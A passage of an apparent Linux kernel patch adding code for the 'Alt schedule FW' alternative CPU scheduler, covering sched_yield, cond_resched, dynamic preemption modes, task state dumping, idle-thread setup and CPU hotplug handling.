++SYSCALL_DEFINE0(sched_yield)
++{
++	do_sched_yield();
++	return 0;
++}
++
++#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
++int __sched __cond_resched(void)
++{
++	if (should_resched(0)) {
++		preempt_schedule_common();
++		return 1;
++	}
++	/*
++	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
++	 * whether the current CPU is in an RCU read-side critical section,
++	 * so the tick can report quiescent states even for CPUs looping
++	 * in kernel context.  In contrast, in non-preemptible kernels,
++	 * RCU readers leave no in-memory hints, which means that CPU-bound
++	 * processes executing in kernel context might never report an
++	 * RCU quiescent state.  Therefore, the following code causes
++	 * cond_resched() to report a quiescent state, but only when RCU
++	 * is in urgent need of one.
++	 */
++#ifndef CONFIG_PREEMPT_RCU
++	rcu_all_qs();
++#endif
++	return 0;
++}
++EXPORT_SYMBOL(__cond_resched);
++#endif
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define cond_resched_dynamic_enabled	__cond_resched
++#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(cond_resched);
++
++#define might_resched_dynamic_enabled	__cond_resched
++#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(might_resched);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
++int __sched dynamic_cond_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_cond_resched);
++
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
++int __sched dynamic_might_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_might_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_might_resched);
++#endif
++#endif
++
++/*
++ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
++ * call schedule, and on return reacquire the lock.
++ *
++ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
++ * operations here to prevent schedule() from being called twice (once via
++ * spin_unlock(), once by hand).
++ */
++int __cond_resched_lock(spinlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held(lock);
++
++	if (spin_needbreak(lock) || resched) {
++		spin_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		spin_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_lock);
++
++int __cond_resched_rwlock_read(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_read(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		read_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		read_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_read);
++
++int __cond_resched_rwlock_write(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_write(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		write_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		write_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_write);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++
++#ifdef CONFIG_GENERIC_ENTRY
++#include <linux/entry-common.h>
++#endif
++
++/*
++ * SC:cond_resched
++ * SC:might_resched
++ * SC:preempt_schedule
++ * SC:preempt_schedule_notrace
++ * SC:irqentry_exit_cond_resched
++ *
++ *
++ * NONE:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * VOLUNTARY:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- __cond_resched
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * FULL:
++ *   cond_resched               <- RET0
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- preempt_schedule
++ *   preempt_schedule_notrace   <- preempt_schedule_notrace
++ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
++ */
++
++enum {
++	preempt_dynamic_undefined = -1,
++	preempt_dynamic_none,
++	preempt_dynamic_voluntary,
++	preempt_dynamic_full,
++};
++
++int preempt_dynamic_mode = preempt_dynamic_undefined;
++
++int sched_dynamic_mode(const char *str)
++{
++	if (!strcmp(str, "none"))
++		return preempt_dynamic_none;
++
++	if (!strcmp(str, "voluntary"))
++		return preempt_dynamic_voluntary;
++
++	if (!strcmp(str, "full"))
++		return preempt_dynamic_full;
++
++	return -EINVAL;
++}
++
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
++#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
++#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
++#else
++#error "Unsupported PREEMPT_DYNAMIC mechanism"
++#endif
++
++void sched_dynamic_update(int mode)
++{
++	/*
++	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
++	 * the ZERO state, which is invalid.
++	 */
++	preempt_dynamic_enable(cond_resched);
++	preempt_dynamic_enable(might_resched);
++	preempt_dynamic_enable(preempt_schedule);
++	preempt_dynamic_enable(preempt_schedule_notrace);
++	preempt_dynamic_enable(irqentry_exit_cond_resched);
++
++	switch (mode) {
++	case preempt_dynamic_none:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: none\n");
++		break;
++
++	case preempt_dynamic_voluntary:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_enable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: voluntary\n");
++		break;
++
++	case preempt_dynamic_full:
++		preempt_dynamic_disable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_enable(preempt_schedule);
++		preempt_dynamic_enable(preempt_schedule_notrace);
++		preempt_dynamic_enable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: full\n");
++		break;
++	}
++
++	preempt_dynamic_mode = mode;
++}
++
++static int __init setup_preempt_mode(char *str)
++{
++	int mode = sched_dynamic_mode(str);
++	if (mode < 0) {
++		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
++		return 0;
++	}
++
++	sched_dynamic_update(mode);
++	return 1;
++}
++__setup("preempt=", setup_preempt_mode);
++
++static void __init preempt_dynamic_init(void)
++{
++	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
++		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
++			sched_dynamic_update(preempt_dynamic_none);
++		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
++			sched_dynamic_update(preempt_dynamic_voluntary);
++		} else {
++			/* Default static call setting, nothing to do */
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
++			preempt_dynamic_mode = preempt_dynamic_full;
++			pr_info("Dynamic Preempt: full\n");
++		}
++	}
++}
++
++#define PREEMPT_MODEL_ACCESSOR(mode) \
++	bool preempt_model_##mode(void)						 \
++	{									 \
++		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
++		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
++	}									 \
++	EXPORT_SYMBOL_GPL(preempt_model_##mode)
++
++PREEMPT_MODEL_ACCESSOR(none);
++PREEMPT_MODEL_ACCESSOR(voluntary);
++PREEMPT_MODEL_ACCESSOR(full);
++
++#else /* !CONFIG_PREEMPT_DYNAMIC */
++
++static inline void preempt_dynamic_init(void) { }
++
++#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
++
++/**
++ * yield - yield the current processor to other threads.
++ *
++ * Do not ever use this function, there's a 99% chance you're doing it wrong.
++ *
++ * The scheduler is at all times free to pick the calling task as the most
++ * eligible task to run, if removing the yield() call from your code breaks
++ * it, it's already broken.
++ *
++ * Typical broken usage is:
++ *
++ * while (!event)
++ * 	yield();
++ *
++ * where one assumes that yield() will let 'the other' process run that will
++ * make event true. If the current task is a SCHED_FIFO task that will never
++ * happen. Never use yield() as a progress guarantee!!
++ *
++ * If you want to use yield() to wait for something, use wait_event().
++ * If you want to use yield() to be 'nice' for others, use cond_resched().
++ * If you still want to use yield(), do not!
++ */
++void __sched yield(void)
++{
++	set_current_state(TASK_RUNNING);
++	do_sched_yield();
++}
++EXPORT_SYMBOL(yield);
++
++/**
++ * yield_to - yield the current processor to another thread in
++ * your thread group, or accelerate that thread toward the
++ * processor it's on.
++ * @p: target task
++ * @preempt: whether task preemption is allowed or not
++ *
++ * It's the caller's job to ensure that the target task struct
++ * can't go away on us before we can do any checks.
++ *
++ * In Alt schedule FW, yield_to is not supported.
++ *
++ * Return:
++ *	true (>0) if we indeed boosted the target task.
++ *	false (0) if we failed to boost the target.
++ *	-ESRCH if there's no task to yield to.
++ */
++int __sched yield_to(struct task_struct *p, bool preempt)
++{
++	return 0;
++}
++EXPORT_SYMBOL_GPL(yield_to);
++
++int io_schedule_prepare(void)
++{
++	int old_iowait = current->in_iowait;
++
++	current->in_iowait = 1;
++	blk_flush_plug(current->plug, true);
++	return old_iowait;
++}
++
++void io_schedule_finish(int token)
++{
++	current->in_iowait = token;
++}
++
++/*
++ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
++ * that process accounting knows that this is a task in IO wait state.
++ *
++ * But don't do that if it is a deliberate, throttling IO wait (this task
++ * has set its backing_dev_info: the queue against which it should throttle)
++ */
++
++long __sched io_schedule_timeout(long timeout)
++{
++	int token;
++	long ret;
++
++	token = io_schedule_prepare();
++	ret = schedule_timeout(timeout);
++	io_schedule_finish(token);
++
++	return ret;
++}
++EXPORT_SYMBOL(io_schedule_timeout);
++
++void __sched io_schedule(void)
++{
++	int token;
++
++	token = io_schedule_prepare();
++	schedule();
++	io_schedule_finish(token);
++}
++EXPORT_SYMBOL(io_schedule);
++
++/**
++ * sys_sched_get_priority_max - return maximum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the maximum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = MAX_RT_PRIO - 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++/**
++ * sys_sched_get_priority_min - return minimum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the minimum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
++{
++	struct task_struct *p;
++	int retval;
++
++	alt_sched_debug();
++
++	if (pid < 0)
++		return -EINVAL;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++	rcu_read_unlock();
++
++	*t = ns_to_timespec64(sched_timeslice_ns);
++	return 0;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/**
++ * sys_sched_rr_get_interval - return the default timeslice of a process.
++ * @pid: pid of the process.
++ * @interval: userspace pointer to the timeslice value.
++ *
++ *
++ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
++ * an error code.
++ */
++SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
++		struct __kernel_timespec __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_timespec64(&t, interval);
++
++	return retval;
++}
++
++#ifdef CONFIG_COMPAT_32BIT_TIME
++SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
++		struct old_timespec32 __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_old_timespec32(&t, interval);
++	return retval;
++}
++#endif
++
++void sched_show_task(struct task_struct *p)
++{
++	unsigned long free = 0;
++	int ppid;
++
++	if (!try_get_task_stack(p))
++		return;
++
++	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
++
++	if (task_is_running(p))
++		pr_cont("  running task    ");
++#ifdef CONFIG_DEBUG_STACK_USAGE
++	free = stack_not_used(p);
++#endif
++	ppid = 0;
++	rcu_read_lock();
++	if (pid_alive(p))
++		ppid = task_pid_nr(rcu_dereference(p->real_parent));
++	rcu_read_unlock();
++	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
++		free, task_pid_nr(p), ppid,
++		read_task_thread_flags(p));
++
++	print_worker_info(KERN_INFO, p);
++	print_stop_info(KERN_INFO, p);
++	show_stack(p, NULL, KERN_INFO);
++	put_task_stack(p);
++}
++EXPORT_SYMBOL_GPL(sched_show_task);
++
++static inline bool
++state_filter_match(unsigned long state_filter, struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/* no filter, everything matches */
++	if (!state_filter)
++		return true;
++
++	/* filter, but doesn't match */
++	if (!(state & state_filter))
++		return false;
++
++	/*
++	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
++	 * TASK_KILLABLE).
++	 */
++	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
++		return false;
++
++	return true;
++}
++
++
++void show_state_filter(unsigned int state_filter)
++{
++	struct task_struct *g, *p;
++
++	rcu_read_lock();
++	for_each_process_thread(g, p) {
++		/*
++		 * reset the NMI-timeout, listing all files on a slow
++		 * console might take a lot of time:
++		 * Also, reset softlockup watchdogs on all CPUs, because
++		 * another CPU might be blocked waiting for us to process
++		 * an IPI.
++		 */
++		touch_nmi_watchdog();
++		touch_all_softlockup_watchdogs();
++		if (state_filter_match(state_filter, p))
++			sched_show_task(p);
++	}
++
++#ifdef CONFIG_SCHED_DEBUG
++	/* TODO: Alt schedule FW should support this
++	if (!state_filter)
++		sysrq_sched_debug_show();
++	*/
++#endif
++	rcu_read_unlock();
++	/*
++	 * Only show locks if all tasks are dumped:
++	 */
++	if (!state_filter)
++		debug_show_all_locks();
++}
++
++void dump_cpu_task(int cpu)
++{
++	if (cpu == smp_processor_id() && in_hardirq()) {
++		struct pt_regs *regs;
++
++		regs = get_irq_regs();
++		if (regs) {
++			show_regs(regs);
++			return;
++		}
++	}
++
++	if (trigger_single_cpu_backtrace(cpu))
++		return;
++
++	pr_info("Task dump for CPU %d:\n", cpu);
++	sched_show_task(cpu_curr(cpu));
++}
++
++/**
++ * init_idle - set up an idle thread for a given CPU
++ * @idle: task in question
++ * @cpu: CPU the idle task belongs to
++ *
++ * NOTE: this function does not set the idle thread's NEED_RESCHED
++ * flag, to make booting more robust.
++ */
++void __init init_idle(struct task_struct *idle, int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	__sched_fork(0, idle);
++
++	raw_spin_lock_irqsave(&idle->pi_lock, flags);
++	raw_spin_lock(&rq->lock);
++
++	idle->last_ran = rq->clock_task;
++	idle->__state = TASK_RUNNING;
++	/*
++	 * PF_KTHREAD should already be set at this point; regardless, make it
++	 * look like a proper per-CPU kthread.
++	 */
++	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	kthread_set_per_cpu(idle, cpu);
++
++	sched_queue_init_idle(&rq->queue, idle);
++
++#ifdef CONFIG_SMP
++	/*
++	 * It's possible that init_idle() gets called multiple times on a task,
++	 * in that case do_set_cpus_allowed() will not do the right thing.
++	 *
++	 * And since this is boot we can forgo the serialisation.
++	 */
++	set_cpus_allowed_common(idle, cpumask_of(cpu));
++#endif
++
++	/* Silence PROVE_RCU */
++	rcu_read_lock();
++	__set_task_cpu(idle, cpu);
++	rcu_read_unlock();
++
++	rq->idle = idle;
++	rcu_assign_pointer(rq->curr, idle);
++	idle->on_cpu = 1;
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
++
++	/* Set the preempt count _outside_ the spinlocks! */
++	init_idle_preempt_count(idle, cpu);
++
++	ftrace_graph_init_idle_task(idle, cpu);
++	vtime_init_idle(idle, cpu);
++#ifdef CONFIG_SMP
++	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
++			      const struct cpumask __maybe_unused *trial)
++{
++	return 1;
++}
++
++int task_can_attach(struct task_struct *p,
++		    const struct cpumask *cs_effective_cpus)
++{
++	int ret = 0;
++
++	/*
++	 * Kthreads which disallow setaffinity shouldn't be moved
++	 * to a new cpuset; we don't want to change their CPU
++	 * affinity and isolating such threads by their set of
++	 * allowed nodes is unnecessary.  Thus, cpusets are not
++	 * applicable for such threads.  This prevents checking for
++	 * success of set_cpus_allowed_ptr() on all attached tasks
++	 * before cpus_mask may be changed.
++	 */
++	if (p->flags & PF_NO_SETAFFINITY)
++		ret = -EINVAL;
++
++	return ret;
++}
++
++bool sched_smp_initialized __read_mostly;
++
++#ifdef CONFIG_HOTPLUG_CPU
++/*
++ * Ensures that the idle task is using init_mm right before its CPU goes
++ * offline.
++ */
++void idle_task_exit(void)
++{
++	struct mm_struct *mm = current->active_mm;
++
++	BUG_ON(current != this_rq()->idle);
++
++	if (mm != &init_mm) {
++		switch_mm(mm, &init_mm, current);
++		finish_arch_post_lock_switch();
++	}
++
++	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
++}
++
++static int __balance_push_cpu_stop(void *arg)
++{
++	struct task_struct *p = arg;
++	struct rq *rq = this_rq();
++	struct rq_flags rf;
++	int cpu;
++
++	raw_spin_lock_irq(&p->pi_lock);
++	rq_lock(rq, &rf);
++
++	update_rq_clock(rq);
++
++	if (task_rq(p) == rq && task_on_rq_queued(p)) {
++		cpu = select_fallback_rq(rq->cpu, p);
++		rq = __migrate_task(rq, p, cpu);
++	}
++
++	rq_unlock(rq, &rf);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	put_task_struct(p);
++
++	return 0;
++}
++
++static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
++
++/*
++ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but only
++ * effective when the hotplug motion is down.
++ */
++static void balance_push(struct rq *rq)
++{
++	struct task_struct *push_task = rq->curr;
++
++	lockdep_assert_held(&rq->lock);
++
++	/*
++	 * Ensure the thing is persistent until balance_push_set(.on = false);
++	 */
++	rq->balance_callback = &balance_push_callback;
++
++	/*
++	 * Only active while going offline and when invoked on the outgoing
++	 * CPU.
++	 */
++	if (!cpu_dying(rq->cpu) || rq != this_rq())
++		return;
++
++	/*
++	 * Both the cpu-hotplug and stop task are in this case and are
++	 * required to complete the hotplug process.
++	 */
++	if (kthread_is_per_cpu(push_task) ||
++	    is_migration_disabled(push_task)) {
++
++		/*
++		 * If this is the idle task on the outgoing CPU try to wake
++		 * up the hotplug control thread which might wait for the
++		 * last task to vanish. The rcuwait_active() check is
++		 * accurate here because the waiter is pinned on this CPU
++		 * and can't obviously be running in parallel.
++		 *
++		 * On RT kernels this also has to check whether there are
++		 * pinned and scheduled out tasks on the runqueue. They
++		 * need to leave the migrate disabled section first.
++		 */
++		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
++		    rcuwait_active(&rq->hotplug_wait)) {
++			raw_spin_unlock(&rq->lock);
++			rcuwait_wake_up(&rq->hotplug_wait);
++			raw_spin_lock(&rq->lock);
++		}
++		return;
++	}
++
++	get_task_struct(push_task);
++	/*
++	 * Temporarily drop rq->lock such that we can wake-up the stop task.
++	 * Both preemption and IRQs are still disabled.
++	 */
++	raw_spin_unlock(&rq->lock);
++	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
++			    this_cpu_ptr(&push_work));
++	/*
++	 * At this point need_resched() is true and we'll take the loop in
++	 * schedule(). The next pick is obviously going to be the stop task
++	 * which kthread_is_per_cpu() and will push this task away.
++	 */
++	raw_spin_lock(&rq->lock);
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++	struct rq *rq = cpu_rq(cpu);
++	struct rq_flags rf;
++
++	rq_lock_irqsave(rq, &rf);
++	if (on) {
++		WARN_ON_ONCE(rq->balance_callback);
++		rq->balance_callback = &balance_push_callback;
++	} else if (rq->balance_callback == &balance_push_callback) {
++		rq->balance_callback = NULL;
++	}
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++/*
++ * Invoked from a CPUs hotplug control thread after the CPU has been marked
++ * inactive. All tasks which are not per CPU kernel threads are either
++ * pushed off this CPU now via balance_push() or placed on a different CPU
++ * during wakeup. Wait until the CPU is quiescent.
++ */
++static void balance_hotplug_wait(void)
++{
++	struct rq *rq = this_rq();
++
++	rcuwait_wait_event(&rq->hotplug_wait,
++			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
++			   TASK_UNINTERRUPTIBLE);
++}
++
++#else
++
++static void balance_push(struct rq *rq)
++{
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++}
++
++static inline void balance_hotplug_wait(void)
++{
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++static void set_rq_offline(struct rq *rq)
++{
++	if (rq->online)
++		rq->online = false;
++}
++
++static void set_rq_online(struct rq *rq)
++{
++	if (!rq->online)
++		rq->online = true;
++}
++
++/*
++ * used to mark begin/end of suspend/resume:
++ */
++static int num_cpus_frozen;
++
++/*
++ * Update cpusets according to cpu_active mask.  If cpusets are
++ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
++ * around partition_sched_domains().
++ *
++ * If we come here as part of a suspend/resume, don't touch cpusets because we
++ * want to restore it back to its original state upon resume anyway.
++ */
++static void cpuset_cpu_active(void)
++{
++	if (cpuhp_tasks_frozen) {
++		/*
++		 * num_cpus_frozen tracks how many CPUs are involved in suspend
++		 * resume sequence. As long as this is not the last online
++		 * operation in the resume sequence, just build a single sched
++		 * domain, ignoring cpusets.
++		 */
++		partition_sched_domains(1, NULL, NULL);
++		if (--num_cpus_frozen)
++			return;
++		/*
++		 * This is the last CPU online operation. So fall through and
++		 * restore the original sched domains by considering the
++		 * cpuset configurations.
++		 */
++		cpuset_force_rebuild();
++	}
++
++	cpuset_update_active_cpus();
++}
++
++static int cpuset_cpu_inactive(unsigned int cpu)
++{
++	if (!cpuhp_tasks_frozen) {
++		cpuset_update_active_cpus();
++	} else {
++		num_cpus_frozen++;
++		partition_sched_domains(1, NULL, NULL);
++	}
++	return 0;
++}
++
++int sched_cpu_activate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/*
++	 * Clear the balance_push callback and prepare to schedule
++	 * regular tasks.
++	 */
++	balance_push_set(cpu, false);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going up, increment the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++	set_cpu_active(cpu, true);
++
++	if (sched_smp_initialized)
++		cpuset_cpu_active();
++
++	/*
++	 * Put the rq online, if not already. This happens:
++	 *
++	 * 1) In the early boot process, because we build the real domains
++	 *    after all cpus have been brought up.
++	 *
++	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
++	 *    domains.
++	 */
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	set_rq_online(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	return 0;
++}
++
++int sched_cpu_deactivate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	int ret;
++
++	set_cpu_active(cpu, false);
++
++	/*
++	 * From this point forward, this CPU will refuse to run any task that
++	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
++	 * push those tasks away until this gets cleared, see
++	 * sched_cpu_dying().
++	 */
++	balance_push_set(cpu, true);
++
++	/*
++	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
++	 * users of this state to go away such that all new such users will
++	 * observe it.
++	 *
++	 * Specifically, we rely on ttwu to no longer target this CPU, see
++	 * ttwu_queue_cond() and is_cpu_allowed().
++	 *
++	 * Do sync before park smpboot threads to take care the rcu boost case.
++	 */
++	synchronize_rcu();
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	update_rq_clock(rq);
++	set_rq_offline(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going down, decrement the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
++		static_branch_dec_cpuslocked(&sched_smt_present);
++		if (!static_branch_likely(&sched_smt_present))
++			cpumask_clear(&sched_sg_idle_mask);
++	}
++#endif
++
++	if (!sched_smp_initialized)
++		return 0;
++
++	ret = cpuset_cpu_inactive(cpu);
++	if (ret) {
++		balance_push_set(cpu, false);
++		set_cpu_active(cpu, true);
++		return ret;
++	}
++
++	return 0;
++}
++
++static void sched_rq_cpu_starting(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	rq->calc_load_update = calc_load_update;
++}
++
++int sched_cpu_starting(unsigned int cpu)
++{
++	sched_rq_cpu_starting(cpu);
++	sched_tick_start(cpu);
++	return 0;
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++
++/*
++ * Invoked immediately before the stopper thread is invoked to bring the
++ * CPU down completely. At this point all per CPU kthreads except the
++ * hotplug thread (current) and the stopper thread (inactive) have been
++ * either parked or have been unbound from the outgoing CPU. Ensure that
++ * any of those which might be on the way out are gone.
++ *
++ * If after this point a bound task is being woken on this CPU then the
++ * responsible hotplug callback has failed to do it's job.
++ * sched_cpu_dying() will catch it with the appropriate fireworks.
++ */
++int sched_cpu_wait_empty(unsigned int cpu)
++{
++	balance_hotplug_wait();
++	return 0;
++}
++
++/*
++ * Since this CPU is going 'away' for a while, fold any nr_active delta we
++ * might have. Called from the CPU stopper task after ensuring that the
++ * stopper is the last running task on the CPU, so nr_active count is
++ * stable. We need to take the teardown thread which is calling this into
++ * account, so we hand in adjust = 1 to the load calculation.
++ *
++ * Also see the comment "Global load-average calculations".
++ */
++static void calc_load_migrate(struct rq *rq)
++{
++	long delta = calc_load_fold_active(rq, 1);
++
++	if (delta)
++		atomic_long_add(delta, &calc_load_tasks);
++}
++
++static void dump_rq_tasks(struct rq *rq, const char *loglvl)
++{
++	struct task_struct *g, *p;
++	int cpu = cpu_of(rq);
++
++	lockdep_assert_held(&rq->lock);
++
++	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
++	for_each_process_thread(g, p) {
++		if (task_cpu(p) != cpu)
++			continue;
++
++		if (!task_on_rq_queued(p))
++			continue;
++
++		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
++	}
++}
++
++int sched_cpu_dying(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/* Handle pending wakeups and then migrate everything off */
++	sched_tick_stop(cpu);
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
++		WARN(true, "Dying CPU not properly vacated!");
++		dump_rq_tasks(rq, KERN_WARNING);
++	}
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	calc_load_migrate(rq);
++	hrtick_clear(rq);
++	return 0;
++}
++#endif
++
++#ifdef CONFIG_SMP
++static void sched_init_topology_cpumask_early(void)
++{
++	int cpu;
++	cpumask_t *tmp;
++
++	for_each_possible_cpu(cpu) {
++		/* init topo masks */
++		tmp = per_cpu(sched_cpu_topo_masks, cpu);
++
++		cpumask_copy(tmp, cpumask_of(cpu));
++		tmp++;
++		cpumask_copy(tmp, cpu_possible_mask);
++		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
++		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
++		/*per_cpu(sd_llc_id, cpu) = cpu;*/
++	}
++}
++
++#define TOPOLOGY_CPUMASK(name, mask, last)\
